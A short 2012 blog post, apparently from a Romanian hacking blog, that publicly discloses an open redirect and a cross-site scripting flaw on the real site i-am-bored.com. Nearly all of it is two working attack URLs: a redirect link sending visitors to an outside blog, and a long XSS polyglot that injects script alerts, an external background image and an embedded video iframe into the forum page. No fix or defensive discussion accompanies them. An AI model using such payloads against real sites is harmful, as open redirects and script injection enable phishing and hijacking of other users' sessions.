vineri, 6 ianuarie 2012

i-am-bored.com cross site scripting and redirect

Good place for xss and redirect. And i like humor.

The secret to humor is surprise.
(c) Aristotle

Redirect:

http://cms.i-am-bored.com/link.aspx?e=link_click&a=67225&l=top10_last_24_hours&d=http://st2tea.blogspot.com

XSS:

Browser: Mozilla Firefox.

http://www.i-am-bored.com/forums.asp?page_num=1%22%3E%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Cbody%20background=%22http://dezzi.ru/images/56955304_1269567973_85.png%22%3E%3Cscript%3Ealert%28%22When%20Sony%20bored..%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/H_9BHkA9Xyg%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&action=read&q_id=67245&ct=10



Publicat de Sony la 11:40
Etichete: ,

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.